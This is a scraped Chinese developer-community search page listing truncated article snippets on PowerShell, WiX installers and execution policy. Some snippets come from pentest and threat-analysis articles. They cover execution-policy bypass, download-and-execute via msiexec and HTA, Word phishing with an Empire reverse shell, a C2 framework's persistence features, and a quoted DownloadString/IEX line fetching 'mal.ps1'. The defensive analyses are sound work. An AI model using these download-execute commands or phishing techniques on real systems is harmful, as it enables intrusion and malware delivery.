从WiX中静默执行PowerShell脚本挂起PowerShell - 腾讯云开发者社区

文章/答案/技术大牛

发布

PowerShell系列（六）：PowerShell脚本执行策略梳理

PowerShell 脚本执行策略用于控制何时以及何种方式执行 PowerShell 脚本。通过执行策略可以限制 PowerShell 脚本的执行范围，为系统管理员提供一定的安全保障。...策略可以限制执行脚本的用户、限制执行脚本的来源等等。这些策略可以在计算机本地或组策略中进行配置。最终保护计算机免受恶意脚本和非法操作的侵害。今天给大家讲解PowerShell脚本执行策略相关的知识！...1、执行策略等级● AllSigned：要求所有脚本和配置文件都由受信任的发布者签名，包括在本地计算机上编写的脚本；从尚未分类为受信任或不受信任的发布者运行脚本之前，需要确认是否执行。...● Bypass：脚本执行没有任何限制● RemoteSigned：本地计算机上的本地脚本，不需要数字签名直接允许；从Internet或其他计算机下载的脚本，需要脚本必须经过数字签名才能运行。...关闭 PowerShell 会话时，变量和值将被删除。● CurrentUser：执行策略仅影响当前用户。它存储在 HKEY_CURRENT_USER 注册表子项中。

3.5K1 1

Powershell绕过执行及脚本混淆

所以我么你可以看见，powershell 并不能执行 cmd 中的全部命令。 powershell 不能执行任何 cmd 命令，准确来说，至少是不能直接执行。...Powershell 可以作为一个应用程序在 cmd 中执行，cmd 也可以在 Powershell 中执行。为什么 powershell 能够执行 cmd 命令？...|powershell.exe -NoP - -noprofile 简写 -NoP，为不加载 windows poweshell 配置文件你也可以从网络上下载脚本并执行，这样就不会写入磁盘和修改配置文件...5.PSConsole：使用 PSConsole 指定 powershell 控制文件 powershell 脚本分析几个较为常用的执行脚本的语句： 1、本地绕过执行策略执行脚本 PowerShell.exe...该攻击脚本可以大致分为4个部分： 1、禁用日志记录，防止我们的脚本运行留下记录 2、建立了一个 webclient，用于下载 3、将要被执行的代码块赋值给 $R 4、从网上下载数据，将其与 $R scriptblock

3.5K0 0

您找到你想要的搜索结果了吗？

是的

没有找到

Powershell中禁止执行脚本解决办法

刚开始使用Powershell，导入管理模块或者其他操作的时候会出现因为在此系统中禁止执行脚本的报错，报错内容如下： Windows PowerShell 版权所有 (C) 2009 Microsoft...Powershell\Sprinkler\src\Scripts\SPRINKLE.ps1，因为在此系统中禁止执行脚本。...在PowerShell执行以下： PS C:\Windows\system32> set-ExecutionPolicy RemoteSigned 执行策略更改执行策略可以防止您执行不信任的脚本...更改执行策略可能会使您面临 about_Execution_Policies 帮助主题中所述的安全风险。是否要更改执行策略?...[Y] 是(Y) [N] 否(N) [S] 挂起(S) [?] 帮助 (默认值为“Y”): y PS C:\Windows\system32>

1.5K7 0

WindosServer 任务计划程序定时执行 powershell 脚本

一、在操作中选择PS1脚本文件运行这里写了一个简单的脚本文件复制aa.txt文本文件，为BB.txt文本文件。Copy-Item ./aa.txt ..../BB.txt那PowerShell脚本文件是无法被执行的。二、如何使用任务计划程序调用Ps脚本？那么这时候我们就需要，借助一个任务计划程序可以执行的脚本了。...没错它就是BAT文件，我们写一个简单的bat文件用于调用PowerShell脚本，代码如下：C:cd “powershell文件路径”C:\WINDOWS\system32\WindowsPowerShell...\v1.0\PowerShell.exe -NonInteractive -File PowerShell.ps1我们在任务计划程序中选择我们bat文件。...我们就可以通过任务计划程序调用cat文件从而实现执行PowerShell脚本。

1.7K1 0

关于win10 powershell下禁止执行脚本的问题

Windows 查看计算机现用执行策略 > get-executionpolicy Restricted Restricted 策略不允许任何脚本运行。...set-ExecutionPolicy RemoteSigned 执行策略更改执行策略可帮助你防止执行不信任的脚本。...更改执行策略可能会产生安全风险，如 https:/go.microsoft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies 帮助主题所述。...是否要更改执行策略? [Y] 是(Y) [A] 全是(A) [N] 否(N) [L] 全否(L) [S] 暂停(S) [?]

1.3K1 0

Windows Servers 2012执行Powershell脚本报错Expand-Archive不存在

默认模块，但是在服务器的Powershell终端内执行提示没有该指令。...但是早些时间在另一台Windows服务器中安装时却没有出现报错，而两台服务器的主要区别便是Windows版本区别，正常的服务器Windows版本为Windows Server 2019，而无法安装的为Windows...Server 2012，此时我想到一个问题，2012的系统的Powershell版本是否已经不受支持且不包含Expand-Archive模块，然后更新Powershell后再次运行脚本，顺利安装。...解决方案前往Github的Powershell项目仓库下载最新版本的安装包即可：https://github.com/PowerShell/PowerShell/releases/ 绝大多数服务器为的...Windows版本为x64，下载PowerShell-版本号-win-x64.msi的文件即可，上传到服务器后安装即可

1.5K1 0

如何使用PS2EXE将PowerShell脚本编译为可执行程序

关于PS2EXE PS2EXE是一个可以将PowerShell脚本编译为可执行程序的模块，在GUI和Ingo Karstein脚本的支持下，该模块能够生成真正的Windows可执行程序。...除此之外，PS2EXE还支持PowerShell 5.x和图形化前端。...注意事项有一些人可能会滥用PS2EXE来编译他的计算机病毒脚本，因此越来越多的病毒扫描程序会将使用PS2EXE创建的程序识别为恶意程序并将其删除。因此，希望大家不要将其用于恶意目的。...\target.exe 上述命令会将“source.ps1”编译成可执行程序target.exe，如果命令参数中忽略了“.\target.exe”的话，生成的文件将为“.\source.exe”。...PowerShell脚本（文件需要是UTF8或UTF16编码） outputFile = 目标可执行文件名称或目录 prepareDebug = 创建调试帮助信息 x86或x64 = 编译运行时32

3.3K3 0

SQL Server的PowerShell扩展(SQLPSX) 2.3版本

Windows PowerShell 是一个功能强大的脚本 shell，管理员和开发人员可以通过它自动执行服务器管理和应用程序部署。...与 Transact-SQL 脚本相比，Windows PowerShell 语言能够支持更复杂的逻辑，这使得 SQL Server 管理员能够生成强大的管理脚本。...Windows PowerShell 脚本还可用来管理其他 Microsoft 服务器产品，这为管理员提供一个跨服务器的公用脚本语言。...可以使用其他命令（如 ren 或 del）针对路径中的节点执行操作。一组 cmdlet（它们在 Windows PowerShell 脚本中用于指定 SQL Server 操作）。...Codeplex上SQL Server的PowerShell扩展(SQLPSX) 2.3版本最近发布了2.3版本，这个版本使用Wix制作的安装包，这同时也是一个学习Wix工具包的好例子。

1.6K5 0

渗透技巧——从github下载文件的多种方法

->download&exec JScript调用powershell实现下载执行的代码为： new ActiveXObject("WScript.Shell").Run("powershell (new-object...->download&exec 6、msiexec 该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》有过介绍，细节不再赘述首先将powershell...== 完整wix文件为：脚本无法执行但是我们可以换一个思路：将hta文件传到github的博客下面，就能够被解析成html，实现代码执行将hta文件上传至github博客下面，地址为https://3gstudent.github.io...再次测试，成功实现下载执行的功能经过以上的测试，我们发现IE浏览器默认会拦截vbs脚本实现的下载功能那么，我们可以大胆猜测，如果下载执行换成powershell实现的话，那么就不会被拦截修改脚本，

4.2K2 0

绕过360进行Word文档钓鱼

于是，尝试其他命令执行漏洞的方法。...安装完Wix工具后执行下列前两条命令，会在同目录下生成一个calc.msi文件，最后一条命令表示远程下载并利用msiexec运行calc.msi文件。...首先配置好empire，具体的配置内容可以参考这篇文章[https://mari0er.club/post/empire.html],之后将生成的powershell代码复制粘贴到wix模板的第15行，...此时打开Word文档就会远程执行下载和安装msi木马的命令，进一步运行powershell进行反弹。...0x04 看到这里有人可能要问：为什么非要先调用msi文件再间接调用powershell呢？直接把执行命令通过RTF脚本写到文档里不是更方便吗？

3.1K5 0

初试WIX加SQL LocalDB

WIX貌似对LocalDB不支持，如果是其它版本的SQL Server，WIX有内置配置支持，很简单。...问题一： WIX内置不支持SQL LocalDB，怎么实现对SQL LocalDB安装及配置解决方案：我的第一想法和现在的做法是用Powershell调用SQL Scripts，然后再用WIX调用Powershell...\LocalDBTestSchema.sql" -X WIX 调用Powershell <ComponentGroup Id="LocalDBTest_Project" Directory="LocalDBTest...所以选择了以下目录 %UserProfile%\AppData\Local\Microsoft\Microsoft SQL Server Local DB 问题三：怎么把一个%UserProfile%目录从Powershell...中传给SQL Script使用解决方案：在Powershell中拿到%UserProfile%目录，然后调用Sqlcmd传给SQL Scripts 代码实现：在Powershell中拿到%UserProfile

1.6K6 0

WiX 3.6——强大的.NET部署工具

Visual Studio 2012去除了“VS Setup”，取而代之以开源的WiX工具包来创建安装包。...最近发布的WiX3.6包括Burn引导程序/安装链，这意味着不仅可以创建像MSI文件这样的安装包，还可以将多个安装包组成安装链（比如安装准备）以向用户提供更加流畅的安装体验。...新发布的WiX还包含了一些新的特性，并且修复了500多个bug。如果你已经在使用VS Setup，可以通过这段PowerShell脚本将既有的VS Setup工程转化为WiX工程格式。...另外，相比于在文本编辑器中编辑XML文件，你可以使用Votive——一个VS包。...使用Votive，可以在Visual Studio中编写WiX脚本，还可以使用智能感知、MSBuild支持和工程模板等功能。

1.3K10 0

Nimbo-C2：一款功能强大的轻量级C2 框架

Nim的功能非常强大，但在跟Windows系统交互时使用PowerShell可能会更加简单，因此该工具的部分功能是基于PowerShell实现的。...NimProtect加密植入物配置和字符串； 3、使用UPX封装Payload，并对PE代码进行混淆处理以增加检测和解包的难度； 4、HTTP通信加密； 5、C2命令行终端支持命令自动补全； 6、在内存中执行...切换到源文件目录中，并运行Docker镜像，暴露的端口为80端口，并会将Nimbo-C2目录加载进容器中（如果是Linux，则需要将下列命令中的${pwd}替换为$(pwd)）： cd Nimbo-C2...Shell命令 iex powershell-scriptblock> -> 在内存中执行PowerShell命令 --== File Stuff ==-...persist run -> 设置运行密钥 persist spe -> 使用静默进程退出技术实现持久化

1.2K3 0

PowerShell中theFuck插件PoShFuck将wtf搜索引擎从Google改为Baidu或者Bing

最近在玩 Windows Terminal 下的 PowerShell 配置。以 ConEmu (x64) 为基础， oh-my-posh 为核心进行改造。...q=PowerShell $preverr" } catch { throw "WTF are you doing?...q=PowerShell $preverr" Start-Process "https://www.baidu.com/s?...wd=PowerShell $preverr" # Start-Process "https://cn.bing.com/search?...q=PowerShell $preverr" } catch { throw "WTF are you doing?

1.1K2 0

懒猿福利：自动安装 Windows 10 开发环境

针对这些现状，我选择使用Powershell及Choco来设计新的自动装机脚本。Powershell负责配置Windows，Choco则可以自动从网上下载最新的软件安装包并静默安装。...在Powershell中，可以使用Rename-Computer命令完成。获取用户输入的命令是Read-Host，输出文字的命令是Write-Host，给变量赋值直接用=，不需要声明类型。...Restart-Computer 自我提权各位可能已经发现了，上面的步骤几乎都是要求管理员权限才能执行的。...，如果没有，会弹出UAC申请一个管理员权限的Powershell并继续运行当前脚本。...Powershell里做循环的方式和C#非常类似，用foreach语法。在这个例子里，我把要删除的UWP名称放在了一个字符串数组中，然后用循环去删除他们。

2.2K3 0

基于伪造CAPTCHA的剪贴板劫持钓鱼攻击研究

（三）PowerShell作为攻击载体PowerShell因其强大的系统管理能力、内置Windows环境、支持远程脚本执行等特点，长期被红队与攻击者滥用。...粘贴执行阶段：用户在PowerShell、CMD或终端中粘贴内容并回车，触发脚本执行。...Net.WebClient).DownloadString('http://192.168.1.100/mal.ps1')"若用户随后打开PowerShell并粘贴执行，系统将静默下载并运行mal.ps1...启用脚本块日志：在Windows事件日志中开启PowerShell Script Block Logging，便于事后审计。...命令行粘贴保护：在PowerShell/CMD中引入“粘贴确认”机制，类似Linux的safe-paste插件，防止意外执行。

3891 0

windows setx命令设置环境变量的BUG，神坑

截断后注册表操作异常触发权限校验脚本中断，部署失败关键认知：现代开发环境 PATH 常超 2000+ 字符（多版本 JDK/Python/Node/工具链叠加），setx 在企业级自动化中已不适用...✅ 终极解决方案：PowerShell 原生命令# 以管理员身份运行 PowerShell 执行：[Environment]::SetEnvironmentVariable( 'PATH',...→ “以管理员身份运行”作用域选择：'Machine'：影响所有用户（系统级，需管理员）'User'：仅当前用户（无需管理员，适合用户级工具）生效验证：# 新开 CMD/PowerShell 窗口执行...：将 PATH 操作封装为独立函数，集成路径存在性校验日志追踪：记录修改前/后的 PATH 哈希值，便于审计回滚静默安装流程：# 示例：Node.js 安装 + PATH 注入（管理员权限下）Start-Process...msiexec.exe -Wait -ArgumentList "/i node-v20.0.0-x64.msi /qn"# 执行上方 PATH 更新脚本替代方案参考：pathman（微软官方工具，需额外分发

2961 0

静默内网存活探测

静默内网存活探测一、前言临近教育护网，再次来研究一个之前没有细究过的内容：静默内网存活探测,当你突破边界服务器进入内网的时候就会面临着这个问题，如何在不被发现的情况下进行内网探测。...二、正文本文仅探究静默内网存活探测，不对前期的内网信息收集做过多的介绍 1、icmp协议探测 windows使用如下命令扫描192.168.1.0/24网段下存活主机，该方法流量和正常ping流量相似...$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done 2、arp探测通过arp可以探测出一些信息，也没动静 arp -a 3、PowerShell 使用powershell...脚本进行扫描就需要上传对应的脚本才能进行扫描 powershell.exe ‐exec bypass ‐Command "Import‐Module ....首先看一下帮助信息：可以使用如下命令查看缓存信息： nbtstat -c 5、shell脚本 shell实用脚本（探测内网存活主机） - 简书 (jianshu.com) #!

1.6K2 0

OCRFix僵尸网络利用ClickFix技术的攻击机理

本文深入剖析了OCRFix僵尸网络的运作机制，从社会工程学诱饵的设计、ClickFix技术的心理操控逻辑，到基于PowerShell的载荷执行与命令控制（C2）通信架构进行了全方位解构。...使用IEX (Invoke-Expression) 在内存中执行脚本，不落地文件 IEX $scriptContent}catch { # 静默失败，避免引起用户怀疑 exit}在上述示例中...OCRFix可能会采用“进程镂空”（Process Hollowing）技术：创建一个挂起的合法进程实例，将其内存内容清空，然后填入恶意代码并恢复执行。...对于PowerShell，可以限制其只能执行签名脚本，或禁用其对于普通用户的访问权限。内存扫描：部署具备内存扫描能力的EDR代理，定期扫描进程内存中的恶意代码特征，即使没有文件落地也能发现威胁。...从伪造OCR错误场景诱导用户复制代码，到利用PowerShell在内存中执行恶意载荷，再到通过隐蔽的C2通道组建僵尸网络，每一个环节都经过了精心设计，旨在最大化攻击成功率并最小化被发现的概率。

2671 0

powershell:脚本中检查mingw-w64编译器是否能生成 3264位代码

mingw-w64提供的编译器不同的版本生成代码的能力是不一样的，有的只能生成32位代码有的只能生成64位代码，在powershell脚本中，为了自动化执行编译，就需要事先检查指定编译的生成代码的能力...poershell代码实现实现如下： # 上一条命令执行出错则中止脚本执行 function exit_on_error(){ if ( ! $?

1.2K10 0

点击加载更多

PowerShell系列（六）：PowerShell脚本执行策略梳理

Powershell绕过执行及脚本混淆

Powershell中禁止执行脚本解决办法

WindosServer 任务计划程序定时执行 powershell 脚本

关于win10 powershell下禁止执行脚本的问题

Windows Servers 2012执行Powershell脚本报错Expand-Archive不存在

如何使用PS2EXE将PowerShell脚本编译为可执行程序

SQL Server的PowerShell扩展(SQLPSX) 2.3版本

渗透技巧——从github下载文件的多种方法

绕过360进行Word文档钓鱼

初试WIX加SQL LocalDB

WiX 3.6——强大的.NET部署工具

Nimbo-C2：一款功能强大的轻量级C2 框架

PowerShell中theFuck插件PoShFuck将wtf搜索引擎从Google改为Baidu或者Bing

懒猿福利：自动安装 Windows 10 开发环境

基于伪造CAPTCHA的剪贴板劫持钓鱼攻击研究

windows setx命令设置环境变量的BUG，神坑

静默内网存活探测

OCRFix僵尸网络利用ClickFix技术的攻击机理

powershell:脚本中检查mingw-w64编译器是否能生成 3264位代码

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐